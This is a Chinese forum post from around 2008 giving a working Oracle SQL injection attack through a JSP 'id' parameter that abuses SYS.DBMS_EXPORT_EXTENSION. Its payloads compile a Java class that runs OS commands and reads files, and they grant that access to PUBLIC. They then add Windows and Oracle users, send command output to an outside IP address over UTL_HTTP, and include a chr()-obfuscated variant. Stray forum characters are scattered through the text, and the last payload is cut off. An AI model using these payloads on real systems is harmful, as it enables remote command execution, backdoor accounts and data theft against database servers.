以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
3 H+ y7 h3 c5 T. V) `
* \9 e; }+ P" M! j L /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
" `& q) ]* t+ y# u的形式即可。(用" 'a'|| "是为了让语句返回true值) % I: p( ?3 _ t. e% u4 b
语句有点长,可能要用post提交。
! I: @2 [' A4 }! W/ r$ r) O以下是各个步骤:
! {( t* M( w' |, m1.创建包
" I" M! U& `- m) g( C, P通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:7 K/ P( j) R y9 L5 F) d' i9 ^
/xxx.jsp?id=1 and '1'<>'a'||( + S4 J g, C7 r: g [0 m9 N+ v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 J' i3 Z' E6 B8 z. ?/ z! W
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
, m4 Q Y V4 G; h4 j, unew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}" a m& l- I) X* v) H/ v
}'''';END;'';END;--','SYS',0,'1',0) from dual
: g6 a/ Q+ k9 M/ ~, {6 P) 7 v5 k+ {8 ]; R
------------------------
" c( l( X# \) W5 V" L如果url有长度限制,可以把readFile()函数块去掉,即:
Z! W9 E4 O5 Q/ }) b/xxx.jsp?id=1 and '1'<>'a'||( $ L$ O+ P( C. P2 @" O' O
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 U& ~6 K2 V* n- ccreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(3 a/ U4 `6 p/ _1 Q" B- r1 T
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
4 s u; [' c. t}'''';END;'';END;--','SYS',0,'1',0) from dual
9 r8 `) ]% h) L) @) * S/ X2 g# w0 W* I
同时把后面步骤 提到的 对readFile()的处理语句去掉。
& ~* l1 @5 p' L; U& P# {------------------------------
+ ] ~ \7 |3 R/ Z P1 ?9 K, w2.赋Java权限
& o! s8 G' r! fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual7 ]6 |) |/ O# j8 N5 [5 K% ^. m8 [
3.创建函数 # G+ v6 Y( @+ q/ R/ Z; e4 J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# Y m; L, A4 T7 Zcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual% z# i B2 X2 G5 Z1 \
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, f* y+ Y- S5 a* Y pcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual9 L* \+ h9 W! o2 G
4.赋public执行函数的权限
# ^1 ]" L5 _2 Z3 V+ R# Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
! y5 [. }/ T2 b$ ]* E, Y. u/ _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
* R" `8 i# }: I5 G5.测试上面的几步是否成功
* l) k) ~% X4 ~& t5 w/ L4 Hand '1'<>'11'||( 2 E- z* g) H2 [4 C" W" |
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' 9 o7 G, O. D9 T/ ^1 z6 o O
)
* W: y3 y' X2 V$ V1 rand '1'<>(
1 Q* x, C6 S. s. @! Yselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' $ J5 l" D6 z4 W
) - Q2 X# z# e7 i, F9 y
6.执行命令:
3 j) a# r: [! b" `2 q% s8 U/xxx.jsp?id=1 and '1'<>(
& l- v5 h1 |% A: {select sys.LinxRunCMD('cmd /c net user linx /add') from dual
. @$ d' S( G0 s+ L+ |3 Y
' ~9 P7 [* |, n5 R! v- A+ N) . M# J0 \; O! Y- B+ f
/xxx.jsp?id=1 and '1'<>( , {3 v7 |& j1 ?3 w
select sys.LinxReadFile('c:/boot.ini') from dual$ o1 M/ f* b% b# f
2 q3 h; r% \9 z* h5 q)7 n& u4 u: I7 i- R+ w/ n& h/ X
- `( v& R( H: w2 ?注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 4 J. Y' e$ x U7 k ~4 D8 g
如果要查看运行结果可以用 union : 9 s' z, [- M2 n# M0 o" ^! W
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual* w F9 x" _+ G5 `; I# [
或者UTL_HTTP.request(:
! } V* F( r L/xxx.jsp?id=1 and '1'<>( ( S. N; N2 T" ]6 O& e
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
5 w- O: d9 U+ `$ G" Q1 P)
0 j7 p$ v4 B" Z% a" Y/ J1 M' c3 S/xxx.jsp?id=1 and '1'<>( # X6 i( L! t" u3 }3 q* `. i
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
( o5 j& m5 X* P. n5 k, W)
% X4 ^( `& E$ ~6 E) U注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。( P; A& u- G, V7 S- G' V) U
--------------------
2 D- p0 y* i( s% I# P6.内部变化
+ \: q) c- Q! W# G通过以下命令可以查看all_objects表达改变:
2 z+ k+ b' E5 Wselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%', S) I) Y. `* E- {
7.删除我们创建的函数
- V$ I5 d' m4 m4 a) |% d8 Q9 j. w6 T' |select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. O# Q# S1 c# _/ n& t. u7 x; _drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
' l' G( G( H( o====================================================
! y' }7 S3 D& m全文结束。谨以此文赠与我的朋友。 " L4 K2 A$ ^2 H7 P6 C
linx # l3 r1 h3 m& P8 ?
124829445 * P1 @7 f8 e7 G6 w9 {$ h# M
2008.1.12 $ }' t- R& u9 M+ e
[email protected] & o8 i, b" a% @* O' U! ^
====================================================================== + d1 _# m/ J1 W4 ]. x, v7 f
测试漏洞的另一方法: - j' S! i1 L/ ^
创建oracle帐号: " O4 t! i( w6 ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% k4 I: y/ \" g1 H/ b5 m6 FCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
5 _6 h' f4 o+ K, ]' G即:
) o" T% R' O- d8 [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
0 k; X5 J9 L. Schr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual + Z' T4 I- L0 w$ H5 `. b3 A
确定漏洞存在:
& x4 _3 B" I% W* [: i1<>( 5 d/ X# B9 c( y1 Z
select user_id from all_users where username='LINXSQL'
6 Y) d! Y4 Y* T1 l5 ]; ])
" O+ @) N) w; u9 L4 B, F1 S给linxsql连接权限:
q) R ~ l! G; S$ Z& N$ J" ~9 {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 G) ~. b: e. ?4 w/ p, c+ U# ~
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
: u: c! K& k6 s- b删除帐号:
$ G7 S0 A, J1 l. A! I5 rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' `, K6 s4 u4 \1 U1 k2 D" Kdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual ( _, i9 V/ f0 l. R; f0 S" y; `2 j
====================== ; p; v A* m# E( @% f/ H
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
7 c/ K, @3 i/ i5 Y; C1.jsp?id=1 and '1'<>( k$ s( H1 E. o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 H+ E3 q/ n1 D# w: Ucreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual# M f0 [* T$ x7 j) D0 |2 _1 n: f
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE" o. E7 B0 L* {2 P
)
: q5 ]" e5 e+ h* P4 C* o u# w) M
% T" o' n5 V" u( S) G$ \( j* g: f
2 F, M0 ~/ a: ?) o9 j4 D! {6 l
|
发表于 2012-12-18 12:21:48
收藏
分享
支持
反对